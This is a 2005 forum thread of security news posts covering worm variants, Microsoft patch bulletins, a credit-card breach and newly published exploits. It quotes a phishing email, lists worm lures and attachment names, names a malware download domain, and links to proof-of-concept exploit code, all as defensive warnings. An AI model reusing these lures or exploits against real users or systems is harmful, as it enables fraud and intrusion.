McAfee has featured a new variant each day in June on average so far. Mytob is one of the most advanced worms that hackers can easily modify. It hides in a stealth like manner and appears as an email message from an administrator (always verify these types of messages before clicking on either links or attachments).
Mytob may be worst virus of 2005
The Mytob worm has to be close to #1, for the worst worm 2005. While Netsky.P is #1 in volume (i.e., it’s like the Klez.H worm of old), we can be stop this much older version with current virus defintions. Every day the virus writers easily modify the code and seed fresh copies as AV vendors scramble to cover the latest code derivations and compression techniques. We are most likely averaging one new copy per day.
Some key reasons are:
* Stealth-like, as it can hide for a while on an infected PC and lowers security settings.
* Very well socially engineered (appears like an official admin email message),
* Exploits some unpatched Microsoft security vulnerabilities (MS04-011),
* Technically well crafted also (usually carries a Spybot variant)13 new versions in 13 days
http://vil.nai.com/VIL/newly-discovered-viruses.asp
W32/Mytob.cv@MM 06/13/2005 Low Low 4513
W32/Mytob.ch@MM 06/11/2005 Low Low 4512
W32/Mytob.cg@MM 06/11/2005 Low Low 4512
W32/Mytob.cc@MM 06/08/2005 Low Low 4510
W32/Mytob.ca@MM 06/08/2005 Low Low 4509
W32/Mytob.bx@MM 06/07/2005 Low Low 4508
W32/Mytob.gen!eml 06/07/2005 Low Low 4508
W32/Mytob.bw@MM 06/06/2005 Low Low 4508
W32/Mytob.bv@MM 06/06/2005 Low Low 4508
W32/Mytob.br@MM 06/05/2005 Low Low 4507
W32/Mytob.bo@MM 06/02/2005 Low Low 4506
W32/Mytob.bl@MM 06/01/2005 Low Low 4505
W32/Mytob.bk@MM 06/01/2005 Low Low 4504EMAIL messages to avoid
The virus arrives in an email message from a systems administrator as follows:
From: (Spoofed email sender – may choose from the following list)
support
administrator
mail
service
admin
info
register
webmasterSubject: (Varies, such as)
Your password has been updated
Your password has been successfully updated
You have successfully updated your password
Your new account password is approved
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification
Members Support
Security measures
Email Account Suspension
Notice of account limitationExtensions: pif, scr, exe, cmd, bad, zip
-
June 14, 2005 at 8:22 am #3192756
IE 7 will provide better protection from Spyware
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
-
June 14, 2005 at 4:23 pm #3174376
Microsoft Security Updates – June 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Microsoft Security Updates – June 2005 Bulletin Summary:
http://www.microsoft.com/technet/security/Bulletin/ms05-Jun.mspx
Critical Bulletins:
Cumulative Security Update for Internet Explorer (883939)
http://www.microsoft.com/technet/security/Bulletin/ms05-025.mspxVulnerability in HTML Help Could Allow Remote Code Execution (896358)
http://www.microsoft.com/technet/security/Bulletin/ms05-026.mspxVulnerability in Server Message Block Could Allow Remote Code Execution
(896422)
http://www.microsoft.com/technet/security/Bulletin/ms05-027.mspxImportant Bulletins:
Vulnerability in Web Client Service Could Allow Remote Code Execution
(896426)
http://www.microsoft.com/technet/security/Bulletin/ms05-028.mspxVulnerability in Outlook Web Access for Exchange Server 5.5 Could Allow
Cross-Site Scripting Attacks (895179)
http://www.microsoft.com/technet/security/Bulletin/ms05-029.mspxCumulative Security Update in Outlook Express (897715)
http://www.microsoft.com/technet/security/Bulletin/ms05-018.mspxCumulative Security Update in Outlook Express (897715)
http://www.microsoft.com/technet/security/Bulletin/ms05-030.mspxVulnerability in Step-by-Step Interactive Training Could Allow Remote
Code Execution (898458)
http://www.microsoft.com/technet/security/Bulletin/ms05-031.mspxModerate Bulletins:
Vulnerability in Microsoft Agent Could Allow Spoofing (890046)
http://www.microsoft.com/technet/security/Bulletin/ms05-032.mspxVulnerability in Telnet Client Could Allow Information Disclosure
(896428)
http://www.microsoft.com/technet/security/Bulletin/ms05-033.mspxCumulative Security Update for ISA Server 2000 (899753)
http://www.microsoft.com/technet/security/Bulletin/ms05-034.mspxRe-Released Bulletins:
SQL Server Installation Process May Leave Passwords on System (Q263968)
http://www.microsoft.com/technet/security/Bulletin/ms02-032.mspxASP.NET Path Validation Vulnerability (887219)
http://www.microsoft.com/technet/security/Bulletin/ms05-004.mspxVulnerability in Outlook Web Access for Exchange Server 5.5 Could Allow
Cross-Site Scripting Attacks (895179)
http://www.microsoft.com/technet/security/Bulletin/ms05-029.mspx -
June 17, 2005 at 8:00 pm #3175029
Credit Card Security Breach exposes up to 40 million accounts
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
??? Please check your statements carefully during the next few billing cycles as hackers recently obtained key information related to Master Card accounts.??
KEY IMPACTS
*? As many as 40 million cards may have been exposed, making it the largest breach of personal financial data in a string of recent cases.
*? The breach occurred at Card Systems Solutions, Inc., a third-party processor of payment card data who processes transactions on behalf of financial institutions and merchants.
* CardSystems has already taken steps to improve the security of its system, MasterCard said it was giving the company “a limited amount of time” to demonstrate compliance with MasterCard security requirements.
-
June 18, 2005 at 8:00 am #3174983
Spam Analysis – How to examine email header information
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
-
June 18, 2005 at 8:00 pm #3173552
Beagle.BT – (aka Bagle worm) New Variant
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
All new versions of the Bagle/Beagle worm are important to watch as they are technically advanced and disguised well to trick users into opening attachments (use of zip extension).
Beagle.BT – (aka Bagle worm) New Variant
Beagle.BT – new version of Bagle wormW32.Beagle.BT@mm is a mass-mailing worm that uses its own SMTP engine to send out copies of a Trojan.Tooso variant. The worm also opens a back door on the compromised computer on TCP port 80.
EMAIL FORMAT
From: Spoofed.
Subject: Blank.
Message: “The password is” or “Password:”
Attachment: ZIP … Multiple Zip files may contain copies of the virus, plus an executable copy of the Trojan.Tooso. -
June 20, 2005 at 8:00 am #3173304
40,000,000 credit cards exposed – an update
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Sharing a quick update on latest discoveries. The primary cause of this exposure is improper storage and use of confidential information on their servers, followed by hackers discovering this due to weak security controls.
1. A new phishing attack has been launched to capitalize on this
http://www.theregister.co.uk/2005/06/20/mastercard_phishing/
Quote: From: Master Bank [master@masterbank.com] To: Subject: **Your Mastercard online Confirmation** Dear User, During our regular update and verification of the accounts, we couldn’t verify your current information. Either your information has changed or it is incomplete. If the account information is not updated to current information within 5 days then, your access will be restricted. 2. According to reports, 68,000 MasterCard cardholders have already found fraudulent charges on their accounts.
3. The head of a credit card processing company whose Tucson center was hit by computer hackers says compromised consumer records shouldn’t even have been in the data base. Under rules established by Visa and MasterCard, processors aren’t supposed to retain cardholder information after handling transactions.
4. CardSystems Solutions C-E-O John Perry tells The New York Times the data was being stored for “research purposes” to determine why some transactions registered as unauthorized or uncompleted.
5. He says that the records known to have been stolen covered roughly 200-thousand of the 40 (m) million compromised credit card accounts. They include Visa, Mastercard and other companies.
-
June 20, 2005 at 8:00 pm #3175776
Opera 8.01 released to patch security issues
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
QUOTE: Opera Software today released the first Opera 8 update, Opera 8.01, for Windows and Linux. To fine-tune the well-received browser, Opera 8.01 includes security and small bug fixes as well as JavaScript improvements. This update succeeds the release of Opera 8 on April 19, 2005, which has now reached more than five million downloads.
Accompanying the Opera 8.01 release for Windows and Linux is the final version of Opera 8 for Macintosh. Read the press release.
To download Opera 8 visit http://www.opera.com/download/
View the changelog.
-
June 21, 2005 at 12:00 pm #3175445
TechNet – Some free e-learning resources for SQL-Server 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Click Here: Microsoft resources to prepare for SQL-Server 2005
quote: Microsoft Learning ResourcesWhether you are interested in database administration, database development, or business intelligence, you will find classroom training, books, free skills assessments, and free* e-learning to help you get up to speed on the newest features of the software. The online assessments help you analyze your current skills, and provide you with a learning plan that recommends books, e-learning, classroom training, TechNet and MSDN resources. Our E-Learning courses are an effective way to learn on your own schedule and feature hands-on virtual labs that provide an in-depth, online training experience.
-
June 21, 2005 at 8:00 pm #3175278
Multiple browsers are vulnerable to the Dialog Origin Spoofing Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Secunia Research has discovered a vulnerability in various browsers, which can be exploited by malicious web sites to spoof dialog boxes. The problem is that JavaScript dialog boxes do not display or include their origin, which allows a new window to open e.g. a prompt dialog box, which appears to be from a trusted site.
– Mozilla / Firefox / Camino Dialog Origin Spoofing Vulnerability – Microsoft Internet Explorer Dialog Origin Spoofing Vulnerability – Opera Dialog Origin Spoofing Vulnerability If you go to the test page, please make sure no critical applications are open and test cautiously:
-
June 22, 2005 at 8:00 pm #3179015
Microsoft’s Security Guidance Center
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Microsoft’s Security Guidance Center
Home Security Protection
Get the information you need to protect your home PC. This site puts valuable tips, tools, and training at your fingertips.
Learn about Computer Security At Home
Security for IT Professionals
Find the tools, training, and updates you need to assist with planning and managing a security strategy for your organization.
Find answers in the TechNet Security Center
Small Business Security Protection
Access important resources for updating software, setting up a firewall, and backing up data in a small business environment.
Visit the Small Business Security Guidance Center
Designing and Developing Secure Applications
Learn how to write more secure code with these developer-focused articles, tools, and security resources.
-
June 23, 2005 at 12:05 pm #3177732
Microsoft Technet – Security Planning Guides
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
The June 2005 TechNet security newletter featured the following security planning guides:Review the Latest Microsoft Server Security Guides -
June 24, 2005 at 4:04 am #3176802
MS05-011 – Exploit Code to attack SMB vulnerabilities published
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Hopefully, most companies and individuals have up-to-date on Microsoft security patches. This new exploit developed in February could be used in future computer viruses and worms.
MS05-011 – Exploit Code to attack SMB vulnerabilities published
http://isc.sans.org/diary.php?date=2005-06-23QUOTE: FrSIRT has published exploit code for the recent flaw in Microsoft Server Message Block (SMB). The advisory and patch related to this vulnerability were released on February 8th, 2005. If you still have not patched, you are further urged to do so in light of the release of exploit code.
FfSIRT – Published exploit (be care as POC code is here)
http://www.frsirt.com/exploits/20050623.mssmb_poc.c.php -
June 25, 2005 at 8:04 am #3178473
MS05-030: Microsoft Outlook Express NNTP Buffer Overflow Exploit
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Hopefully, most companies and individuals are up-to-date on Microsoft security patches. This new exploit has just been developed from the MS05-030 security bulletin published in June. It could be adapted for use in future computer viruses and worms.
MS05-030: Microsoft Outlook Express NNTP Buffer Overflow Exploit
http://www.frsirt.com/exploits/20050624.MS05-030-NNTP.c.phpMS05-030: Cumulative Security Update in Outlook Express (897715)
http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx -
June 26, 2005 at 4:04 am #3176593
Microsoft Tech-Ed 2005 post conference resources
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
I’ve attended two past Tech Ed conferences and they provide highly focused technical training opportunties. Microsoft shares a number of post-conference links and publications as noted below:
http://microsoft.sitestream.com/teched2005/
- Track Descriptions
- Keynotes
- Strategic Briefings
- Breakout Sessions
- Manuals for Hands on Labs & Instructor Led Labs
- Continuing Your Education
-
June 26, 2005 at 4:04 am #3176594
Veritas Backup Software – Remote Control Exploit in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
The Veritas Backup utility suites offer advanced functionality and some of security controls associated with remote control functionality have been compromised. This includes a new in-the-wild exploit and administrators should review trusted Firewall port settings and move to the latest versions of the software as noted in the advisories below.
http://isc.sans.org/diary.php?date=2005-06-25
QUOTE: We received some reports about spikes on port 10000. The main reason for that is the release of the exploit for Veritas, and used by the Metasploit Framework. … It seems this exploit is crashing the service listening on port 10000. If sysadmins know they have backup exec installed and they scan the system they will see port 6101 and 10000 normally. After the exploit it will show only the port 6101 still listening.”
Veritas Security Bulletins
Veritas Backup Exec/NetBackup Request Packet Denial Of Service Vulnerability
Veritas Backup Exec Server Remote Registry Access Vulnerability
Veritas Backup Exec Remote Agent Null Pointer Dereference Denial Of Service Vulnerability
Veritas Backup Exec Remote Agent for Windows Servers Authentication Buffer Overflow Vulnerability
Veritas Backup Exec Admin Plus Pack Option Remote Heap Overflow Vulnerability
VERITAS Backup Exec Web Administration Console Remote Buffer Overflow VulnerabilityFrSirt – Veritas Backup Exec Agent “CONNECT_CLIENT_AUTH” Request Exploit
http://www.frsirt.com/exploits/20050625.backupexec_agent.pm.php -
June 30, 2005 at 8:04 am #3187357
MS05-017 Exploit has been published
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
http://isc.sans.org/diary.php?date=2005-06-28
The FrSIRT published new exploit for MS05-017 vulnerability. The MS05-017 is vulnerability in Message Queuing, the remote attacker can execute command from remote. It’s time to patch and filter some unnecessary port.
-
June 30, 2005 at 10:39 am #3187234
phpBB 2.0.16 Fixes a Critical Security Issue
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
http://isc.sans.org/diary.php?date=2005-06-29
If you’re using the popular phpBB bulletin board package, it’s time to upgrade. Version 2.0.16, released earlier this week, fixes a critical security issue that can lead to the compromise of the vulnerable web server. The problem is with the viewtopic.php script, which, according to the FrSIRT advisory, fails to properly validate input when processing the “highlight” parameter. A similar vulnerability was being exploited by the Santy worm to deface web sites about half a year ago, as we reported in the December 21, 2004 diary. Please update your copy of phpBB to help prevent another such worm from gaining steam.
For information about the phpBB 2.0.16 release, see the phpBB Group announcement. You can get the updated package from their downloads page.
-
July 1, 2005 at 9:03 pm #3187564
ISC Warning — Be on the Lookout for PHP compromises
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
ISC Warning — Be on the Lookout for PHP compromises
Quote: Be on the Lookout for PHP compromises This is a call to all the network and system security folks out there … Please be on the lookout for web-based intrusions happening in your environments. There have recently been major vulnerabilities discovered in phpBB and the XML_RPC libraries, which we have reported in the last two days.
It’s very likely that these vulnerabilities will be utilized to compromise systems. Try to be vigilant about securing your environment and reviewing your IDS alerts for attacks.
-
July 1, 2005 at 9:03 pm #3187563
Sophos measures Internet Survival time at 12 Minutes
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Internet Survival Time is measured as the amount of time, a brand new unpatched PC will last before it is compromised with a computer virus. However, XP SP2 provides out-of-the-box protection from all current Internet worms. The 12 minutes are because Internet worms like Blaster (MS03-026) and Sasser (MS04-011) continue to circulate and randomly generate IP addresses to attack, from unpatched versions of W/2000 and XP.
Internet Survival Time by Sophos
Anti-virus company Sophos published their own statistic regarding internet survival time at 12 minutes. The survival time currently reported by dshield.org is 31 minutes. Their story also has some interesting statistics on the number of viruses in the first half of 2005 compared to last year.
ISC Link – Sophos measures Internet Survival time at 12 Minutes
-
July 2, 2005 at 5:03 am #3185490
Sophos Virus Report – First Half of 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Sophos Virus Report – First Half of 2005
Sophos – TOP TEN VIRUSES FOR 1ST HALF OF 2005
1 W32/Zafi-D 25.3%
2 W32/Netsky-P 17.5%
3 W32/Sober-N 10.3%
4 W32/Zafi-B 4.7%
5 W32/Netsky-D 3.8%
6 W32/Mytob-BE 2.6%
7 W32/Netsky-Z 2.3%
8 W32/Mytob-AS 2.0%
9 W32/Netsky-B 1.9%
10 W32/Sober-K 1.7%
Others 27.9% -
July 2, 2005 at 5:03 am #3185491
Internet Explorer – Microsoft Security Advisory 903144
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Microsoft is proactively warning of a new flaw in IE that can cause it to unexpectedly exit and execute arbitrary code. No in-the-wild attacks have been reported, but the vulnerability could be used in future virus attacks.
Key protective advice includes:
1. “Think before you click” – Never select untrusted URLs in email or at other websites.
2. Always make sure IE is set to PROMPT for the installation of ActiveX controls from a website in all zones
3. The Security Advisory lists other methods (e.g., removing the Microsoft Java Virtual Machine or unregistering Javaprxy.dll). I’d be careful with this as it could break application packages built around these services.
ZDNet Article: Microsoft warns of unpatched IE flaw
Microsoft Security Advisory (903144)
Microsoft is investigating a new public report of a vulnerability affecting Internet Explorer. We have not been made aware of any attacks attempting to use the reported vulnerability or customer impact at this time,” Microsoft said Thursday in its advisory. “But we are aggressively investigating the public report.”
A patch for the flaw is not available. As an interim measure, the software giant advises people to set their Internet and local intranet security zone settings to “high” before running ActiveX controls
-
July 3, 2005 at 5:02 am #3185288
Windows 2000 SP4 – Rollup Security Update through April 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
The new security rollup for Service Pack 4 is particularly helpful if you need to rebuild a Windows 2000 workstation manually.
Microsoft Security Advisory (891861)
http://www.microsoft.com/technet/security/advisory/891861.mspxMicrosoft Technet Information (891861)
http://support.microsoft.com/kb/891861
Release of Update Rollup 1 for Windows 2000 Service Pack 4 (SP4)
Published: June 28, 2005Today we are announcing the availability of the Update Rollup 1 for Windows 2000 Service Pack 4 (SP4). The Update Rollup will make it easier for customers to improve security of Windows 2000 systems, keep them up to date, and to build new deployment images.
The Update Rollup contains all security updates produced for Windows 2000 between the time SP4 was released and April 30, 2005, the time when the contents of the Update Rollup were locked down for final testing by Microsoft and by external beta & customer sites. The Update Rollup also contains a number of updates that increase system security, reliability, reduce support costs, and support the current generation of PC hardware.
We encourage Windows 2000 SP4 customers to install this update. For more information about this release, see Microsoft Knowledge Base Article 891861
-
July 3, 2005 at 1:03 pm #3185242
Internet Storm Center – Storm clouds on the horizon?
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Usually, the first of every month you can anticipate new variants of: Sober, Bagle, MyDoom, and Mytob to all emerge. The ISC sees 3 potential factors to be EXTRA watchful this week for new threats to emerge:
Internet Storm Center — Possibility for disaster?
http://isc.sans.org/diary.php?date=2005-07-03Quote: At the Internet Storm Center, we sometimes see dark clouds gathering on the horizon. Sometimes it doesn’t come to a real storm, sometimes it does. Unlike the real storm centers we don’t have mathematical models to help in our predictions just yet. Main problem is that it would mean we’d have to predict human nature. 1. As a first ingredient we have the probing and even at least one worm/botnet on the loose attacking unpatched phpBB installations.
2. As a second ingredient we see the 0-day exploits and the lack of a real patch from Microsoft for the javaprxy.dll . This makes the most popular browser potentially seriously vulnerable as this exploit matures.
3. The final ingredient is timing: in the US it’s Independence Day tomorrow, which most probably only leaves a skeleton staff at key places.
-
July 8, 2005 at 5:02 am #3183160
Internet Explorer Workaround for Javaprxy.dll vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
I have installed the latest patch which disables Javaprxy.dll (a DLL service used for Java debugging). It’s safe to disable this rarely used facility and I’ve had zero issues thus far.
Microsoft updated their security advisory (903144) of a COM Object (Javaprxy.dll) which can cause Internet Explorer to Unexpectedly Exit. The advisory update with Microsoft Download Center Information for the registry key update that disables Javaprxy.dll in the Explorer. But still workaround and no official patch available.
1. To install this patch, select this link security advisory
2. Then expand the WORKAROUNDS information and select this link
Disable the Javaprxy.dll COM object from running in Internet Explorer
3. Download the specific patch for your version of Internet Explorer (select Help/About if you’re unsure which version of IE you are using). -
July 8, 2005 at 9:03 am #3182678
New series of Trojan Horses attack corporate networks
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
An outbreak of Trojan horse programs is hitting networks around the world, an e-mail security company has warned. MessageLabs said it has blocked 54,000 copies of new Downloader Trojans since 6 p.m. PDT on Wednesday.
-
July 9, 2005 at 9:02 am #3169576
CERT WARNING – Targeted Trojan Email Attacks
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
As noted yesterday some corporate users in TVDUG have reported seeing a marked increase in intercepting new trojan horse emails this week. CERT has also issued a special security bulletin to warn of targeted attacks. It is informative and users should be cautious at all times when processing email messages.
http://www.us-cert.gov/cas/techalerts/TA05-189A.html
The United States Computer Emergency Readiness Team (US-CERT) has received reports of an email based technique for spreading trojan horse programs. A trojan horse is an attack method by which malicious or harmful code is contained inside apparently harmless files. Once opened, the malicious code can collect unauthorized information that can be exploited for various purposes, or permit computers to be used surreptitiously for other malicious activity. The emails are sent to specific individuals rather than the random distributions associated with a phishing attack or other trojan activity. (Phishing is the act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that can be used for identity theft.) These attacks appear to target US information for exfiltration. This alert seeks to raise awareness of this kind of attack, highlight the important need for government and critical infrastructure systems owners and operators to take appropriate measures to protect their data, and provide guidance on proper protective measures.
-
July 9, 2005 at 9:02 am #3169577
Microsoft Security Bulletins Preview – July 12, 2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
On 12 July 2005 Microsoft is planning to release Windows and Office security updates.
*************************************************
Title: July 2005 Microsoft Security Response Center Bulletin
Issued: July 7, 2005
*************************************************Security Updates
2 Microsoft Security Bulletins affecting Microsoft Windows The greatest aggregate, maximum severity rating for these bulletin is Critical. Some of these updates will require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
1 Microsoft Security Bulletin affecting Microsoft Office. The greatest aggregate, maximum severity rating for this bulletin is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
Microsoft Windows Malicious Software Removal Tool– Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS).
-
July 9, 2005 at 9:02 am #3169578
TROJ_DONBOMB.A – Fake CNN movie circulating on London attacks
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This is an example of tactics some virus writers will revert to in order to create a system infection. Avoid selecting attachments found in any email message.
This particular attack can be deceptive as it appears to be legitimate as part of an actual CNN webpage is used. Be careful on all emails relating to tragedies or political themes as this is a common social engineering approach.
TROJ_DONBOMB.A – Fake CNN movie circulating on London attacks
Subject: TERROR HITS LONDON
From: “CNN Newsletter” {breakingnews@cnnonline.com}
Message body: {A modified HTML copy of the CNN web page regarding the London Bombing}
Attachment: LondonTerrorMovie.zip (containing the following .ZIP files) London Terror Moovie.avi – multiple spaces
Note: These details may vary since affected systems can become proxy servers.
P.S. On a personal basis, I continue to remember friends and other affected in London in my thoughts & prayers.
-
July 12, 2005 at 1:03 pm #3185177
Microsoft Security Bulletins – July 2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Below is a summary of the July Security Bulletins. Be sure to invoke both Windows and Office Updates:
Microsoft Security Bulletins – July 2005
http://www.microsoft.com/technet/security/Bulletin/ms05-Jul.mspx
Vulnerability in Microsoft Word Could Allow Remote Code Execution (903672) CRITICAL
http://www.microsoft.com/technet/security/Bulletin/ms05-035.mspx
Vulnerability in Microsoft Color Management Module Could Allow Remote Code Execution (901214) CRITICAL
http://www.microsoft.com/technet/security/Bulletin/ms05-036.mspxVulnerability in JView Profiler Could Allow Remote Code Execution (903235) CRITICAL
http://www.microsoft.com/technet/security/Bulletin/ms05-037.mspx
Re-Released Bulletin:Vulnerability in Telnet Client Could Allow Information Disclosure (896428) MODERATE
http://www.microsoft.com/technet/security/Bulletin/ms05-033.mspx -
July 12, 2005 at 5:02 pm #3185081
Mozilla Firefox 1.05 – Security Update Release
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Firefox 1.05 has been released to improve security and address past issues. So far, in early testing it’s working smoothly for me, as I use it as a complementary browser with IE 6 under XP SP2
Firefox 1.05 Release Notes
http://www.mozilla.org/products/firefox/releases/1.0.5.htmlWindows version here
http://www.mozilla.org/FTP Site – All other builds
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/ -
July 13, 2005 at 5:03 am #3184910
Microsoft Security Bulletins – ISC Analysis of July 2005 release
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Each month the ISC provides an excellent commentary on each Microsoft security bulletin and the specific potential threats they address:
-
July 13, 2005 at 5:02 pm #3190358
Windows 2000 – Move to SP4 as SP3 support expires 6/30/2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
June 30, 2005 is the expiration date of SP3 and all corporate users should migrate workstations and servers to SP4, as the July security updates only apply to SP4 or higher.
IE team notes this here:
http://blogs.msdn.com/ie/archive/2005/05/27/422721.aspxService Pack Life Cycle table
http://support.microsoft.com/gp/lifesupspsWindows Life Cycle table
http://support.microsoft.com/gp/lifewin -
July 14, 2005 at 5:03 am #3190210
Microsoft Baseline Security Analyzer 2.0 available
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Microsoft has released version 2.0 of their free security analysis tool designed to help small and medium-sized businesses evaluate their security according to Microsoft security recommendations.
Microsoft Baseline Security Analyzer KB Article
Microsoft Baseline Security Analyzer Home Page
Microsoft Baseline Security Analyzer 2.0 FAQ
Microsoft Baseline Security Analyzer 2.0
New Features found in MBSA 2.0:
• Severity Ratings
• Locally and remotely scan for Office XP or later security updates
• Added guidance for locating updates and necessary actions
• CVE-IDs for supported updates
• Improved help content
• Windows Server Update Services compatibility
• Automatic Microsoft Update registration and agent update
• Support for detection of updates on 64bit Windows and Windows XP Embedded -
July 15, 2005 at 3:57 am #3188473
Windows XP SP2 vulnerability – Remote Desktop Assistant
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The remote desktop assistant should be turned off if it is not needed. You can do this by right mouse clicking on My Computer, selecting Properties, and then the Remote tab. From there you can select the option to turn off the Remote Assistant capabilities.
Windows XP SP2 vulnerability – Remote Desktop Assistant
http://isc.sans.org/diary.php?date=2005-07-14badpack3t announced the discovery of a so far unpatched vulnerability in Windows XP SP2. The vulnerability in due to a flaw in the remote desktop assistant. This service is NOT FIREWALLED in XP SP2’s default firewall configuration.
badpack3t was able to cause a blue screen. However, there is a chance that this could be used to execute code remotely.
RDP uses port 3389 TCP. In one MSFT document, 3389 UDP is mentioned, but we could not verify that RDP listens on 3389 UDP.
Our sensors did see a slight increase in port 3389 TCP scanning starting about two weeks ago. The increase is small, and somewhat consistent with a small number of new scanners.
Other references to this issue:
http://secunia.com/advisories/16071/
https://www.immunitysec.com/pipermail/dailydave/2005-July/002185.html -
July 15, 2005 at 7:58 am #3188402
Ideas for improving sluggish Windows performance
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
-
July 15, 2005 at 11:57 am #3188293
W32/Reatle@MM Worms – Medium Risk by F-Secure
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This new emailer/downloader/network worm is sophisticated and starting to spread. F-Secure ranks it as Medium Risk currently.
W32/Reatle@MM Worms – Medium Risk by F-Secure
http://www.f-secure.com/v-descs/lebreat.shtml
http://vil.nai.com/vil/content/v_134885.htmThis detection is for several variants of a mass-mailing worm written in MSVC, and packed with MEW. The worm bears the following characteristics:
1. Contains its own SMTP engine for mailing itself outgoing messages have spoofed From: address
2. Attempts to propagate to remote machines via two old exploits:
3. Attempts to download 2 other binaries. At the time of writing these are detected as W32/Generic.m, and W32/Sdbot.worm.gen.bj with the specified DATs.) The worm attempts to download a binary via a URL hardcoded in its body.
4. In addition the worm opens a backdoor on TCP port 8885.
5. Administrators should block access to the following domain … Please do not go to this malicious site:
Code: h t t p : / / j 0 r . b i z 6. Attachment names in the EMAIL message
The attachment is a copy of the worm, with one of the following filenames:
Quote: account-report.exe
payment.doc (many spaces) .scr
about.doc (many spaces) .bat
help.doc (many spaces) .exe
about.cpl
archive.cpl
about.scr
archive.exe
box.bat
inbox.cpl
box.scr
inbox.exe
docs.cpl
admin.bat
docs.scr
read.cpl
readme.cpl
read.exe
readme.scr
data.scr
file.cpl
data.bat
document.cpl
doc.pif
document.exe
order.cpl
order.exe -
July 17, 2005 at 7:57 am #3190586
Microsoft Advisory – Remote Desktop Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Microsoft Advisory – Remote Desktop Vulnerability
Microsoft has released a security advisory on the vulnerability in Remote Desktop Protocol (RDP). Their initail investigation has confirmed the DoS vulnerability. Services that utilize RDP are not enabled by default, but Remote Desktop is enabled by default on Windows XP Media Center Edition. The advisory has provided the following workarounds:
* Block TCP port 3389 at the firewall.
* Disable Terminal Services or the Remote Desktop feature if they are not required.
* Secure Remote Desktop Connections by using an IPsec policy.
* Secure Remote Desktop Connections by employing a Virtual Private Network (VPN) connection. -
July 17, 2005 at 3:57 pm #3190545
Bagle/Beagle Worm – New Beagle.BW Variant
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Symantec is reporting a new Bagle/Beagle variant that should be closely watched.
* This virus can spread rapidly by email
* It can drop a dangerous secondary payload, which is a network based virus (esp. on unpatched and unsecure systems)
* It is a highly polymorphic virus (changes subjects and attachment names randomly).
* Watch for *.ZIP attachments. -
July 18, 2005 at 7:57 am #3190397
Privacy.Net – Security Tools Site
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Privacy.Net has a wide array of security tools and also includes some product evaluations and security articles.
-
July 18, 2005 at 7:57 am #3190398
Recent Antispyware Evaluation of top 20 products
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
The link below ranks over 20 leading solutions for adware and spyware removal tools.
Reviews 2005 – Listed in order of rating
#1 Spyware Eliminator
#2 CounterSpy
#3 Spy Sweeper
#4 SpySubtract
#5 AntiSpy
#6 Spyware Doctor
#7 PestPatrol
#8 Ad-aware SE Pro
#9 Spyware BeGone
#10 McAfee AntiSpyware
#11 SpyHunter
#12 SpyRemover
#13 XoftSpy
#14 TrueWatch
#15 Spyware Stormer
#16 Maxion Spy Killer
#17 Spy Killer
